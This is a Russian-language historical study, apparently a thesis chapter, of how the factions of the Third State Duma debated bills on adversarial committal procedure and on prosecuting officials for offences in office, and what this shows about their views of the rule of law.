Выводы и рекомендации
Библиографический список
1 ОБСУЖДЕНИЕ ЗАКОНОПРОЕКТА О ВВЕДЕНИИ СОСТЯЗАТЕЛЬНОГО НАЧАЛА В ОБРЯД ПРЕДАНИЯ СУДУ В III ГОСУДАРСТВЕНОЙ ДУМЕ
законопроект преступный служба дума
Сущность законопроекта «о введении состязательного начала в обряд предания суду», который был внесён правительством в Третью Государственную думу в ноябре 1907 г. состояла в следующем. Для того, чтобы ускорить процесс судопроизводства по уголовным делам с участием присяжных заседателей, Министерство юстиции выступило с предложением ввода для передачи прокурором обвинительного заключения в судебную палату, которая служила «обвинительной камерой», перепроверявшей результаты проведения предварительного следствия перед направлением дела в окружной суд, вместо обязательного порядка – порядок диспозитивный. То есть поставить его в зависимость от желания обвиняемого. Министерский законопроект также предполагал предоставить возможность участвующим в деле лицам и их адвокатам отстаивать свои интересы в ходе разбирательства дела в судебной палате, давая там свои «словесные объяснения». Дума внесла в правительственный законопроект определённые дополнения и изменения, направленные на установление дополнительных гарантий лицам, желавшим направить «возражение» на обвинительный акт прокурора в судебную палату. Наиболее важная из поправок предполагала обязательное предоставление несовершеннолетнему обвиняемому защитника для разрешения вместе с ним вопроса о необходимости передачи его дела в обвинительную камеру. Министерский законопроект с поправками думской комиссии, был принят Думой весной 1909 г. Однако Государственный совет в качестве второй законодательной инстанции отклонил его, высказавшись категорически против и правительственной статьи о возможности сторонам и их защитникам предоставлять свои объяснения в судебной палате, и думской поправки к законопроекту, предполагавшей оказание обязательной юридической помощи несовершеннолетним, мотивируя это в основном тем, что реализация этих положений вызовет «торможение» судебного разбирательства. В связи с этим законопроект был повторно внесён в Думу с поправками согласительной комиссии в декабре 1910 г. В силу того, что Дума категорически не согласилась с теми изменениями, на которых настаивал Государственный совет, законопроект был отклонён и в силу так и не вступил.
Полемика, вызвавшая оглашение поправок согласительной комиссии в Думе, демонстрирующая различия в позиции думских группировок по отношению к основным положениям законопроекта, так же как и ранее рассмотренные парламентские дебаты, даёт нам возможность увидеть различия в правосознании господствующих фракций российского парламента третьего созыва.
Ораторы от правых отстаивали редакцию Государственного Совета. Г.Г. Замысловский, проголосовавший за них в согласительной комиссии (первоначально вообще выступая против существования обвинительных камер как таковых), вопреки очевидности считал, что контроль над действиями прокуратуры посредством установления состязательного начала в деле проверки обвинительного акта будет якобы способствовать переходу прокуратуры из роли охранителя законности к роли обвинителя, и что гораздо более действенным поэтому является уже существующий «внутриведомственный» контроль над прокурором. Это ярко иллюстрирует общую позицию правых, согласно которой право являлось простым орудием в руках государственной власти, которая отождествлялась ими с властью административной. Для оправдания своей точки зрения эти фракции применяли излюбленный аргумент националистических организаций, широко пользующихся методом социальной демагогии – обращение к интересам «простого русского народа». Они, по мнению ораторов от правых, состояли в устранении «несправедливости», позволявшей в случае принятия думского законопроекта богатым отстаивать свои интересы в обвинительной камере посредством найма адвоката и не позволявшей делать то же неимущим. Однако подлинный мотив негативного отношения к законопроекту состоял в неприкрытой ненависти ораторов от правых к адвокатуре как таковой. Ф.Ф. Тимошкин выразил желание вообще отменить институт адвокатуры как якобы «мешающий» судопроизводству и отстаивающий лишь собственные корыстные интересы. В этом стремлении к «уравнению в бесправии» проявилось крайне негативное отношение правых к автономии личности от государства, к предоставлению ей возможности самостоятельно отстаивать свои права перед лицом государственных органов. Это означало и отсутствие стремления правых депутатов в своих интересах повышать политическую и правовую культуру народа, содействовать преодолению его правового нигилизма – следствия многовековой отсталости.
Относительно октябристской фракции необходимо сказать, что по этому вопросу она раскололась. Определённая её часть, рупором которой явился член согласительной комиссии Г.В. Скоропадский, изменила своему первоначальному мнению и согласилась с поправками Государственного совета. Причиной тому, видимо, была позиция безусловной поддержки правительства, которой придерживались некоторые члены фракции. И поскольку правительство не выступило в поддержку своего проекта, присоединившись к мнению Совета, они также сочли невозможным отстаивать свою прежнюю позицию. Идя вслед за мнением правительства, в свою очередь, перемещающегося в фарватере «поправевшей» политической конъюнктуры, Г.В. Скоропадский начал утверждать, что ускорение судопроизводства – «главная» часть законопроекта, что её надо добиться «во что бы то ни стало», не обращая внимания на явное умаление правовых гарантий обвиняемого. Само понятие состязательности, первоначально фигурировавшее в названии законопроекта, трактовалось им предельно узко – как синоним диспозитивности направления дела в обвинительную камеру. Активно поддержал член согласительной комиссии и аргумент Совета и правых о якобы «несправедливости» предоставления возможности сторонам давать объяснения в обвинительной камере и прибегать при этом к услугам профессионального адвоката, даже усиливая его доводами о предстоящих дополнительных расходах казны, фактически принося интересы защиты прав личности интересам исполнительной власти. Однако другая, бóльшая часть фракции, представителем которой в комиссии был депутат С.В. Андронов, продолжала оставаться на прежних позициях. Для неё была очевидна ценность обвинительной камеры как инструмента, защищавшего личность на этапе предания суду. Согласившись с диспозитивным порядком передачи дела в обвинительную камеру из-за чрезмерной загруженности палат, ораторы от этой части октябристов, тем не менее, последовательно отстаивали принцип состязательности при рассмотрении там обвинительного акта. Депутаты говорили о том, что «скорости суда не должна быть принесена в жертву справедливость» и что разгрузка судебных палат новым порядком восхождения туда дел и так позволит ускорить процесс. На первое место ими выдвигались интересы подсудимого, защита прав личности от возможного «затемнения истины» прокурорской администрацией, которая осуществляла государственное преследование и была заинтересована в успехе обвинения. Октябристы в связи с этим обратили внимание на надуманность аргументов Государственного совета и правых о якобы создаваемой законопроектом социальной несправедливости. Они убедительно доказали, что уравнение, предлагаемое правыми, достигается в сущности тем, что необходимая для того, чтобы квалифицированно отстаивать интересы подозреваемого, юридическая защита будет устранена и оценке государственного обвинения не будет противопоставлена другая, ограждавшая интересы личности. Однако, в целом, «левыми» октябристами была высказана достаточно пассивная и умеренная позиция, выражавшаяся в том, что голосование против поправок Совета необходимо, прежде всего, для того, чтобы не менять старый порядок предания суду, который в целом их устраивал. Необходимость не допустить ухудшения судебной процедуры была для этой части фракции главным смыслом борьбы против новой редакции законопроекта. Причина этого, по-види-мому, состояла в том, что инструментом ограждения прав личности октябристы считали современный, учитывающий, пусть и в минимальной мере, интересы гражданского общества, государственный механизм, подрывать который они не хотели. Поэтому оратор от «левой» части фракции Н.Т. Шубинской говорил о том, что он «не сторонник полемики законодательных учреждений между собой».
Позицию кадетов озвучил в ходе думских прений признанный думский златоуст В.А. Маклаков. Для Маклакова и кадетов на первом месте стояла защита интересов личности и её прав, а также укрепление авторитета российского правосудия в глазах населения. Достижение этого возможно, по мнению представителя кадетов, лишь при условии максимальной независимости всего процесса судебного разбирательства от узко понимаемых «государственных интересов», под которыми зачастую скрывались приверженность дисциплинарным методам управления российской юстицией. Поэтому Василий Алексеевич выступал против самой сущности законопроекта, реализовывавшего, не в последнюю очередь, бюрократический интерес «упрощения судопроизводства». Кадетский оратор полагал, что мотивировка источника законодательной инициативы о том, что обвинительная камера – формальная инстанция, лишь замедляющая ход судебного разбирательства, абсолютно неверна. Самым ценным моментом в деятельности обвинительной камеры было то обстоятельство, что она служила действенным инструментом контроля над прокуратурой, который заставлял её более тщательно выполнять свою обязанность по составлению обвинительного акта, не допуская небрежности и произвола. Особенно ценна, по мнению Маклакова, была как раз независимость членов судебной палаты от административных интересов, реализовывавшихся через дисциплинарные меры воздействия, которым могли быть подвергнуты представители прокуратуры. Поэтому, на взгляд кадетского лидера, законопроект был ценен лишь положениями, открывавшими возможность для введения состязательного начала в процедуру оценки обвинительного акта судебной палатой. Это начало позволило бы, с точки зрения оратора партии народной свободы, ввести подлинное равноправие, обеспечить подлинно независимое разрешение этого вопроса судебной инстанцией, в интересах ограждения прав личности в суде. Ибо в противном случае, обращает внимание Маклаков, «разбор тяжбы обвиняемого и прокурора превращается в интимную беседу прокурора с инстанцией его проверяющей». Он категорически возражал против аргумента о затягивании судебного разбирательства полемикой сторон в судебной палате, поскольку полагал эту незначительную задержку не оправдывавшей ущемления прав подсудимого и падения авторитета правосудия в глазах населения как следствия «скандального» характера процессов, в которых относящиеся с большей «чуткостью к справедливости» присяжные своими приговорами «будут полемизировать с прокуратурой и следствием». В отличие от октябристов кадеты и прогрессисты, анализируя законопроект, шли даже далее – их категорически не устраивал весь старый порядок придания суду: в ходе прений они активно выступали за дальнейшее расширение состязательного начала путём распространения его на предварительное следствие. Кадетский лидер полагал, что государство должно быть подконтрольно гражданскому обществу. Поэтому он сделал акцент на выявлении реакционной роли Государственного совета, утверждая, что эта роль и должна обусловить решительное «отвержение» его законопроекта. Близкую к кадетам позицию заняли прогрессисты, которые так же горячо и по тем же мотивам поддержали думскую редакцию. Обращает на себя внимание мотив, по которому оратор от прогрессистов С.И. Комсин 2-й категорически отверг аргумент правых и Государственного совета о создании ситуации неравноправия для обвиняемых, пожелавших и не пожелавших лично участвовать в разбирательстве дела в палате. Для него отстаивание своего права неразрывно связано с понятием автономии личности, её независимости от государственной власти – с её именно индивидуальным «правом», а отнюдь не обязанностью искать защиты. Понятие гражданина для него – это, прежде всего, знание своих прав и желание, а отнюдь не только возможность ими пользоваться. Только таким образом должно было на его взгляд идти правовое воспитание населения.
Итогом обсуждения стало отклонение Государственной думой всех поправок Государственного совета и, как следствие, его провал в этой инстанции.
Исходя из вышеизложенного можно сделать следующий вывод. Господствующие фракции Думы в силу различий в партийном правосознании по-разному относились к содержанию законопроекта «о введении состязательного начала в обряд предания суду». Эти различия, которые продемонстрировали бурные дебаты в Думе по поводу принятия законопроекта, заключалось в различных взглядах на сущность и соотношение государства и права; на положение личности в государстве; на цели и методы повышения правовой культуры населения.
Для правых право являлось простым инструментом в руках государства. Поэтому правовой статус личности в государстве, на их взгляд, должен был характеризоваться отсутствием всякой автономии от государственной власти, под которой они фактически понимали власть административную, исполнительную (т.к. необходимости воздействия гражданского общества на государство они не признавали). Налицо было и их стремление, используя политическую и социальную демагогию, поддерживать низкую правовую культуру основной массы населения, законсервировать правовой нигилизм широких народных масс в целях отстаивания своих реакционных политико-правовых идеалов. В отличие от правых думский центр, представленный, в первую очередь, Союзом 17 октября, полагал, что государство должно выражать общественные интересы, но в то же время контролировать общество. Иначе говоря, по мнению ораторов от центра, необходимо было расширение участия гражданского общества в управлении делами государства, но постепенное и под контролем властного аппарата. Поэтому на право октябристы смотрели как на инструмент, защищающий интересы личности, но, в первую очередь, не от государства, а посредством государства. Отсюда – противоречивость и непоследовательность позиции фракции, с одной стороны, признающей правовую автономию личности и необходимость её защиты от государственного произвола, а с другой, ищущей соглашения с властью иногда за счёт сужения этой самой автономии. Кадеты, а также примыкавшие к ним прогрессисты полагали, что государство должно быть подконтрольно гражданскому обществу, что главная функция государства и права – обеспечение прав личности. Они придерживались доктрины, согласно которой право должно стоять выше государства, связывать его, заставлять выполнять свои требования, тем самым выступая провозвестниками идеи правового государства на российской политической арене. Кадеты полагали, что личность должна обладать полной правовой автономией и быть надёжно защищена от опасности произвола, исходящего, в том числе, и от государственной власти.
В отличие от правых они и прогрессисты полагали необходимым поднять правовую культуру населения путём предоставления права каждой отдельной личности отстаивать свои интересы, в том числе и от государства.
Это позволяет понять, что взгляды на судебный процесс у различных группировок российского парламента начала XX в. находились в теснейшей взаимосвязи с их общей политической позицией по отношению к тем принципам, которые, по их мнению, должны были определять взаимодействие государства, общества и личности. Камнем преткновения, водоразделом между фракционными позициями здесь, как и в процессе обсуждения других законопроектов, лёгших в основу судебной реформы, были различия по отношению к постулатам, положившим основу концепции правового государства.
2 ОБСУЖДЕНИЕ ЗАКОНОПРОЕКТА ОБ ИЗМЕНЕНИИ ПОРЯДКА ПРОИЗВОДСТВА ДЕЛ О ПРЕСТУПНЫХ ДЕЯНИЯХ ПО СЛУЖБЕ В III ГОСУДАРСТВЕННОЙ ДУМЕ
Законопроект «Об изменении порядка производства дел о преступных деяниях по службе» [22, с. 40–51] был внесён в Государственную думу осенью 1907 г. по инициативе правительства. Он был передан Государственной думой на рассмотрение комиссии по судебным реформам 19 марта 1909 г. Доклад комиссии был внесён на общее обсуждение в марте 1911 г. Проект активно обсуждался в Думе в 1911–1912 гг. и в феврале 1912 г. был передан в Государственный совет, который своим решением от 9 апреля 1913 г. постановил возвратить его уже Четвёртой думе для нового рассмотрения. В итоге законопроект утверждён так и не был.
Проект этого закона был направлен к сужению так называемой «административной гарантии», т.е. к уменьшению тех процессуальных особенностей, которые отличали производство дел «о преступных деяниях по службе», касающихся должностных лиц от общего порядка судопроизводства. Главной такой особенностью было то, что для возбуждения уголовного преследования и предания суду требовалось обязательное согласие начальства подозреваемого, а судебное разбирательство проводилось без участия присяжных и, в основном, судами второй и третьей инстанции – судебными палатами и сенатом. Правительственный проект вносил в действующее законодательство о предании суду должностных лиц следующие новеллы. Во-первых, прокурору и потерпевшему предоставлялось право обжаловать решение начальства в особые присутствия, состоящие из представителей административного и судебного ведомств, а затем в судебные палаты и сенат. Во-вторых, предание суду должностных лиц теперь должно было осуществляться на общих основаниях (включая даже отмену обязательного высочайшего разрешения на предание суду губернаторов). В-третьих, теперь дела о преступлениях, совершённых по должности, должны были рассматриваться, как и прочие тяжкие уголовные преступления с участием присяжных заседателей. Причём предусматривалось расширение круга должностных лиц, чьи дела рассматривались судом первой инстанции – окружными судами.
Однако, вместе с тем, законопроект не устранял административную гарантию, полностью оставив в неприкосновенности самый важный её элемент – обязательное согласие начальства на предание суду своего подчинённого. Для оправдании этого министром юстиции И.Г. Щегловитовым, участвовавшим в думских дебатах, привлекались такие аргументы, как: специфика административной деятельности, в которой затруднительно будет разобраться судам; отсутствие в России административной юстиции и достаточно чёткого законодательного регулирования пределов «вмешательства государственной власти в частноправовую область». Однако то, что в период неограниченного самодержавия эти законодательные пробелы не были устранены, да и при «новом порядке управления» законотворческие инициативы, призванные устранить эти недостатки законодательства, крайне редко исходили от правительственной власти и, во всяком случае, так и не были проведены в жизнь, позволяют усомниться в искренности этих мотивов. Целью законопроекта, как следует из его же речей, министр считал преодоление «разложения» административной власти, разрушающей государственное управление, и устранение разного рода «технических затруднений», мешающих «правильному течению» административной деятельности. Поскольку в глазах представителей правительственной власти источником суверенитета являлся монарх, то все преобразования, касавшиеся механизма осуществления государственной власти должны были быть направлены на создание технически совершенной властной вертикали, выполнявшей повеления суверена и подчинённого ему правительства. Поэтому полная отмена административной гарантии в ситуации, когда в России существовала относительно независимая судебная власть, с которой приходилось считаться, грозила правительству ослаблением монолитности администрации и её готовности выполнять распоряжения «безоговорочно», что министр трактовал как угрозу «энергии должностных лиц». Не случайно, участвуя в дебатах, глава российского ведомства юстиции открыто выступил против теории разделения властей в её классическом варианте, которая фактически выступала теоретической базой упразднения гарантии, утверждая, что она «ныне уж оставлена» и «современное правосознание относится к ней в высшей степени отрицательно» [5, ст. 2115].
Поправки, внесённые в законопроект думской комиссией, предусматривали: расширение полномочий прокурорского надзора, которому предоставлялось право в некоторых случаях без ведома начальства начинать предварительное следствие и усиление близости к населению, а также независимости судебных присутствий, разрешавших пререкания между прокуратурой и начальством о необходимости возбуждения уголовного преследования.
Анализ обсуждения основных положений законопроекта представителями парламентских фракций позволяет нам выявить особенности их фракционного правосознания, отношения различных депутатских партийных группировок к государственной власти, обществу и личности.
Правые фракции, в целом, дружно выступили против законопроекта, считая его «несвоевременным». Тем не менее, они проголосовали за переход к постатейному чтению и активно участвовали в дебатах. Во-первых, они рассчитывали своими предложениями противодействовать поправкам думской комиссии, усиливавшим те элементы законопроекта, которые были направлены к совершенствованию независимого контроля над административной властью. Во вторых, правые полагались на реакционную позицию Государственного совета (который, действительно, впоследствии «провалил» законопроект).
Ответ на вопрос о причинах отрицательного отношения к попыткам ужесточить контроль над соблюдением законности действий чиновников по отношению к частным лицам надо искать, по-видимому, во взглядах правых на сущность и предназначение государственной власти. Источником суверенитета, по мнению правых, являлся монарх. Представители власти, на их взгляд, должны были быть носителями определённой реакционной идеологии, которую они называли «русским национальным духом», «русской национальной идеей» – т.е. они обязаны исповедовать национализм под лозунгом «Россия – для русских», великодержавный шовинизм и православие в его «фундаменталистском» варианте. Все, кто не поддерживал идейные догматы правых, автоматически записывались последними в разряд не «истинно русских людей», а «супостатов». Поэтому правые не доверяли государственной власти. По их мнению, не только исполнительная, но и (в гораздо большей степени, как относительно автономные от суверена) законодательная и судебная власть были в результате «неоконченной» по их мнению «смуты» 1905 г., подорвавшей основы «русского национального духа», в огромной степени инфильтрованы представителями таких «супостатов» и выполняли их преступную волю. Поэтому в целях прекращения «смуты» они считали любой независимый контроль над административно-полицейскими органами абсолютно недопустимым.
Правые выступали, таким образом, противниками разделения властей. Точнее под флагом «действительного» разделения властей фактически предлагали изоляцию исполнительной власти от законодательной и судебной, с тем, чтобы лишить возможности общество осуществлять какой-либо надзор над администрацией. Народное представительство они рассматривали как законосовещательный орган, выражавший «народное» мнение», а судей – как исполнителей царской воли. Именно по этой причине ораторы от правых, прикрываясь тезисами о специфике административной деятельности и возможности массового устранения «верных» людей, необходимых для наведения «порядка», выступили против права прокурора обжаловать решения начальства об отказе в возбуждении уголовного преследования. В ответ же на предложение комиссии предоставить прокурору весьма ограниченное право на самостоятельное проведение расследования правые и вовсе пригрозили солидарно проголосовать против законопроекта в целом. Однако особенное недовольство правых вызвали положения законопроекта и поправок к нему, касавшиеся усиления более независимого, чем прокурорский, судебного контроля над администрацией. Во втором чтении правые фракции продолжали биться против поправки партии народной свободы, предлагавшей предоставить право возбуждения преследования не только прокурору, но и судебному следователю. Даже в третьем чтении они выражали «сожаление» по поводу поправки комиссии, увеличивавшей в составе судебных присутствий количество судей по сравнению с представителями администрации всего на одного человека.
По тем же причинам не доверяли правые и обществу (т.е. «народу», именем которого действовали в политической жизни). По их мнению, русский народ ещё «не дорос», не поднялся до такой степени сознательности, которая необходима для политических преобразований, т.к. в значительной мере находится под влиянием тех же «супостатов», руководствующихся указаниями «мировой закулисы», провоцирующей в России необходимую для реализации её интересов революцию. Поэтому они фактически отказывали представителям народа в праве контролировать должностных лиц путём участия в суде присяжных. Для рассмотрения таких дел необходима, по их мнению, «государственная», а не «обывательская» точка зрения. Они напрямую обвиняли присяжных в антигосударственных настроениях, «ненадёжности» по идейным, по национальным (опасаясь инородческого населения, которое в районах своего компактного проживания, находясь в оппозиции правительству, могло выносить «несправедливые» приговоры его агентам) и даже по социальным мотивам (говоря о том, что не доверяют «кулакам», появившимся в суде присяжных). Поэтому должностных лиц, по их мнению, должны были судить только назначенные царём судьи.
Принцип верховенства закона правыми вообще не признавался. По их мнению, те, кто «отвергал государство» (которое понималось ими как воплощение их идеологических и классовых интересов), тот «отвергал и закон». Обязанностью органов юстиции было, по их мнению, вовсе не создание гарантий для соблюдения принципа верховенства закона, а обеспечение неукоснительного соблюдения воли суверена и отстаивание определённой идеологической программы, которой должно было руководствоваться правительство. Поэтому правые «исключительные положения», а также военные и военно-полевые суды, свирепствовавшие в ходе революции, считали щитом, прикрывавшим несостоятельность юстиции и образцом для деятельности её органов и агентов.
Отсюда – отсутствие стремления оградить интересы личности от неправомерных действий административно-полицейских органов государственной власти. Относительно положения личности в государстве у правых господствовала точка зрения о необходимости полного подчинения личности государственным (а фактически административным) интересам, превращения её в винтик в механизме государственной власти. Главный недостаток законопроекта, по их мнению, заключался именно в том, что он якобы открывал путь для сведения «личных счётов» недовольного обывателя с чиновником. Для правых гораздо более ценным являлась «репутация должностного лица», а не «неприкосновенность прав» частных лиц.
Таким образом, на основании вышеизложенного можно сделать вывод о том, что партийное и фракционное правосознание было резко отрицательно настроено против идеи правового государства и его основных принципов и постулатов, неотделимых от идеи формирования развитого гражданского общества. Фактически в новых исторических условиях эти взгляды выражали позицию недоверия по отношению и к государственной власти и к обществу, объективно обрекали правых на отсутствие какого-либо реформаторского потенциала, вели их фракции к политической изоляции и в конечном счёте в политический тупик.
Октябристы поддерживали принятие законопроекта, поскольку поддерживали необходимость создания в Росси основ правового строя. Последний, с их точки зрения, подразумевал, в частности, ограждение интересов личности, путём установления принципа законности. Поэтому – медлительность процесса, чрезмерно большое число оправдательных приговоров, то обстоятельство, что участники были лишены права следить за жалобой, поддерживать её, опротестовывать решение по ней, а прокурор лишь формально мог контролировать проведение расследования начальством, поскольку фактически не располагал в отличие от последнего необходимыми материалами по делу – все эти черты «административной гарантии», способствующие нарушению ограждаемых законом прав личности, стали объектом системной критики октябристских ораторов.
Единственным реальным способом обеспечить соблюдение принципа законности в отношении, прежде всего, прав граждан октябристы считали разделение властей. Особое место в утверждении принципа законности и создании гарантий для него октябристы отводили сильной и независимой судебной власти, которая предоставляла бы реальную возможность «отыскивать» убытки, причинённые незаконными действиями должностных лиц. Н.И. Антонов огромное значение придавал усилению судебного авторитета, который будет способствовать уменьшению роли и значения административной гарантии. Именно такая позиция объясняет бурные восторги ораторов от октябристов по поводу положения законопроекта об отмене высочайшей санкции на предание суду губернаторов. Именно она объясняет и тот факт, что по инициативе фракции «Союза» и при его активной поддержке была внесена поправка, согласно которой особое присутствие, разрешающее пререкания между прокуратурой и начальством о необходимости возбуждения уголовного преследования должно быть усилено за счёт независимого от администрации «судебного элемента». Если согласно законопроекту предполагалось равное количество членов, представлявших интересы судебной и административной власти, то согласно поправке присутствие должно было включать четырёх представителей судебной власти и только трёх – административной, что, несомненно, должно было способствовать усилению и укреплению автономии присутствий. Большое значение придавали октябристы и независимости прокурорского надзора. С их подачи, при их активной поддержке в думской комиссии Государственной думой была принята поправка, предоставлявшая прокурору в некоторых случаях (когда есть опасения, что подозреваемый скроется, скроет добытое преступным путём, будет препятствовать расследованию и т.д.) право самостоятельно, без согласия начальства возбуждать уголовное преследование. При этом особо оговаривалась необходимость обеспечить в ходе расследования независимость судебных следователей от прокурорского надзора. Причём докладчик, представлявший центр своей фракции, открыто высказывался за дальнейшее расширение прав прокуратуры, согласившись с мнением левых думских либералов и даже социалистов, что проведение расследования должно стать не правом, а обязанностью прокурора. Показательно, что с соседями «слева» – кадетами и прогрессистами Н.И. Антонова роднила даже мотивировка такого мнения – опасения подвергнуться обвинению в произволе и превышении власти, которые будет испытывать представитель прокуратуры, коему подобная прерогатива предоставлена лишь как его субъективное право. Д.А. Леонов, представлявший «левый центр» фракции, всецело поддержал его в этом вопросе [5, ст. 2240]. Об этом же говорит и предложение исключить из законопроекта ст. 1085, смысл которой заключался в том, чтобы предоставить министру юстиции право давать разрешение на «возбуждение» дела относительно чинов прокурорского надзора именно по мотивам вмешательства чисто административного органа в дела сената, который ранее давал такое разрешение.
Показательно, что октябристы вполне отдавали отчёт в том, что для формирования условий, необходимых для реализации принципа законности, для того, чтобы поставить действенную преграду произволу административно-полицейских органов по отношению к правам простых обывателей, необходимо формирование в России основ гражданского общества, которое могло действенно контролировать местную администрацию, превратив её, действительно, в подчинённую закону «исполнительную ветвь» власти. Проявление контролирующего влияния общества на власть октябристы видели, например, в суде присяжных. При обсуждении законопроекта они приветствовали расширение юрисдикции судов с участием присяжных заседателей в отношении должностных преступлений, именно на том основании, что суд присяжных в отличие от коронного суда представляет собой «суд совести», зависимый в большей степени от «общественного мнения», а не от «юридических тонкостей». Контролирующее влияние общественности на власть видели они и в местном самоуправлении. Так, один из левых «союзников» – крестьянин П.Е. Базилевич в ходе прений по законопроекту выразил активное недоверие по отношению к представителям местной администрации и видел выход в развитии местного самоуправления, полагая, что только введение всесословной мелкой земской единицы поставит действенную преграду произволу уездной бюрократии.
Однако, вместе с тем, октябристы не были принципиальными противниками административной гарантии и не выступали категорически против её сохранения. Причина этого, по-видимому, также состояла в своеобразии взглядов «союзников» на сущность государственной власти. Они полагали, что суверенитет целиком и полностью принадлежит монарху, власть которого при новом строе лишь вводится в рамки закона. Поэтому они считали абсолютно недопустимым колебать её авторитет и активно выражать несогласие с её позицией и с позицией непосредственно подконтрольной и подчинённой ей административно-полицейской власти. Октябристы предпочитали компромисс с ней. В силу таких взглядов октябристы как фракция в итоге проголосовали против поправки своих «соседей слева» – кадетов и прогрессистов, выступавших за вменение прокурору в обязанность проводить предварительное следствие, во всех случаях должностных преступлений, не ожидая согласия на это начальства. Характерно, что Д.А. Леонов, защищавший эту позицию фракции (фактически вопреки своему собственному мнению), говорил о необходимости сохранения компромиссного и эволюционного характера закона. Не поддержали октябристы и поправки левых либералов, полностью устранявших административный элемент из состава особых присутствий.
Октябристы основывали свое решение на общих с правительством аргументах о необходимости «всестороннего» освещения материалов дела, что ещё раз подчеркивает компромиссную по отношению к интересам администрации позицию «союзников». Даже попытки левых либералов исключить: ст. 1123, которая предоставляла право суду определять, кто именно из свидетелей – должностных лиц должен явиться лично, а кто может быть допрошен на месте, и ссылки на статьи Уголовного Уложения, выводящие из общего порядка преследования служащих банковских учреждений, которые по-прежнему должны были судиться не присяжными, а сословными представителями – т.е. поправки, которые преследовали целью упрочить принцип равенства всех перед законом как основополагающий принцип правового государства – вызвали возражения октябристов и были провалены Думой. Причём провалены по маловразумительным мотивам – нежелания нарушать уже «действующий закон», структуру «общего построения закона» и т.д. Причина была всё та же – необходимость поиска компромисса с монархом, а значит, с правительством и второй палатой, необходимость добиваться «достижения единства власти» практически любой ценой.
Оригинальность взглядов октябристов на сущность и предназначение государственной власти заключалось ещё и в том, что защищать права и интересы граждан они собирались, в первую очередь, всё же не «от государства», а «посредством государства». Гражданское общество, расширение его влияния на государственную власть, с их точки зрения, было необходимо, но это расширение должно было протекать постепенно и под контролем государственной власти. Стремление обеспечить «солидарность» власти объясняет и своеобразие их концепции разделения властей. Она предполагала под флагом «единства власти» необходимость известного ограждения административно-полицейской власти (которую они считали первенствующей в силу её особой роли в защите законности и прав частных лиц) от «чрезмерного» вмешательства, которое могло «притупить энергию» должностных лиц власти судебной и законодательной.
Правые октябристы вообще считали, что суть законопроекта не только в защите прав частных лиц, но и в противодействии «несправедливому возбуждению преследования против должностных лиц», полагая вслед за правительством, что государство расшатывает, прежде всего, не бесконтрольность чиновничества, а «междуведомственные столкновения» [5, ст. 2112]. Инструментом реализации этой концепции они считали построение в России системы административной юстиции, ограждающий исполнительную власть от «чрезмерного вмешательства» судебной. Голосуя за формулу перехода к очередным делам, традиционно завершающую прения по законопроекту, необходимость создания такой юстиции в России поддержало подавляющее большинство фракции. До появления административной юстиции октябристы полагали необходимым возложить основные функции по контролю над администрацией, в первую очередь, не на суды, а на прокуратуру, которая, по сути, являлась институтом, с одной стороны, независимым от местной администрации, а с другой – возглавлялась министром юстиции, т.е. членом «солидарного» правительства. Поэтому октябристы фактически поддержали правых, высказывавшихся против предлагаемого левыми либералами предоставления относившимся к судебной власти судебным следователям наряду с прокурором самостоятельного возбуждения преследования. При этом и правые, и октябристы в один голос говорили о якобы недостаточной «опытности» несменяемых следователей и необходимости в связи с этим ограждения должностных лиц от «легкомысленного возбуждения уголовного преследования» [5, ст. 2272].
Вместе с тем, октябристы всячески пытались укрепить доверие общества к власти, выдвигая эту цель на первый план. Об этом свидетельствует и высказываемое октябристами мнение о том, что суд присяжных над должностными лицами необходим, прежде всего, не в целях большей объективности судебного решения, а для укрепления доверия к власти [5, ст. 2097]. Об этом свидетельствует широкая поддержка октябристами правительственного решения приблизить суд, который будет рассматривать дела должностных лиц «к населению», расширив юрисдикцию окружных судов по этим делам. Октябристами были поддержаны и две поправки, предложенные левыми либералами, которые расширяли самостоятельность прокурора в области возбуждения уголовного преследования по отношению к должностным лицам. Согласно первой, вместо редакции комиссии, которая предоставляла, как уже указывалось, прокурору право на самостоятельное возбуждение дела лишь «в нетерпящих отлагательства случаях», теперь предполагалось предоставить его прокурору во всех случаях «когда он признаёт это необходимым» (но не вменяла таковое ему в обязанность, чего добивались кадеты и прогрессисты) [5, ст. 2295]. Вторая предоставляла прокурорскому надзору право наблюдения за производством дознания. Однако обе эти поправки носили, скорее, косметический характер. Таким образом, основные «либеральные» дополнения к законопроекту, поддержанные «союзниками» для создания гарантий независимого контроля над администрацией со стороны гражданского общества и формируемых им институтов, в сущности, маловажны и направлены скорее к достижению «внешнего», пропагандистского эффекта.
Таким образом, октябристы, с одной стороны, придерживаясь точки зрения о необходимости укрепления централизации и автономии административной власти, а с другой, признавая необходимость контроля над ней со стороны общества, выход видели в необходимости укрепления доверия народа к власти, считая именно это, а не разделение властей, не гарантии политических свобод и не верховенство закона основной целью и содержанием «нового порядка». Они фактически поменяли местами средство и цель, что привело их фактически к обману общества, к попыткам внешними, демонстрационными, пропагандистскими приёмами внушить ему идею о торжестве «правового строя». Причины такого политического мировоззрения крылись в подспудном недоверии к обществу. Показательно отношение «центриста» Д.А. Леонова к местному самоуправлению – к инструменту, который мог помочь наладить действенный механизм контроля гражданского общества над административной властью. Он, как ни странно, от лица фракции выступил за уменьшение надзорных прав земств и городов над должностными лицами, предложив исключить из правительственного законопроекта статью о предоставлении права начала предварительного следствия по делам «земских» должностных лиц земским и городским органам самоуправления. Аргументировалась эта поправка низким уровнем юридической подготовки земцев, «случайным составом гласных», и «партийной борьбой» среди них [5, ст. 2241]. Однако в действительности причиной была, по-видимому, неблагоприятная электоральная ситуации для октябристов на местах. И поскольку лица, в отношении которых возбуждена процедура уголовного преследования, лишались права выбираться на должности в органах самоуправления, октябристы предпочли «подстраховаться» от этого. Отсюда – вывод о том, что правосознание октябристов, их взгляды на сущность и предназначение государства и права и вытекающая из них законодательная практика характеризовались двойственностью. С одной стороны, они выступали сторонниками торжества принципа законности, признавали в качестве гарантий соблюдения этого принципа разделение властей и развитие местного самоуправления. Однако, с другой – «союзники» не решались затрагивать прерогативы административной власти, поскольку она находилась в ведении верховного суверена – монарха, а признать властный суверенитет за обществом октябристам мешало фактическое недоверие к нему. Поэтому сущность законотворческой политики октябристов можно на примере рассмотрения данного законопроекта во многом охарактеризовать как стремление пропагандистскими мерами укрепить доверие общества к существующему политическому режиму.
